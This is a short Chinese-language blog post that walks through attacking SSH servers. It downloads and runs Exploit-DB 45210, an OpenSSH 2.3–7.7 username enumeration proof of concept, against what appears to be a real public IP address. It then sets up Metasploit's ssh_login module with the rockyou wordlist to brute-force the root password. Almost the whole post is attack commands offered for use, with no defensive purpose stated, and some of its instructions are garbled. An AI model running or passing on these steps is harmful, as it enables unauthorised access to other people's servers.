OpenSSH 2.3 to 7.7 – Username Enumeration Exploit-泓源视野

OpenSSH 2.3 to 7.7 – Username Enumeration Exploit

OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)

username get guess with openssh 22 port

https://www.exploit-db.com/exploits/45210

EDB-ID:

45210

Platform:

LINUX

Date:

2018-08-16
wget https://www.exploit-db.com/download/45210
mv 45210 45210.py
chmod +x 45210.py
python 45210.py --port 22 47.242.58.57 root
if proble run with python2 must $ pip3  install  2to3
pip3 install --upgrade paramiko==2.4.1
python3 45210.py --port 22 47.242.58.** root
(root) is guess username
msfconsole
search ssh
use auxiliary/scanner/ssh/ssh_login
set rhost 47.242.58.**
set username root
set threads 55
set stop_on_success true
set pass_file /usr/share/wordlists/rockyou.txt
show options
run
//
open other terminal $ locate rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
//
OpenSSH 2.3 to 7.7 – Username Enumeration Exploit插图
本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
1

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8233482 位访客, 您的IP是:[172.69.62.60]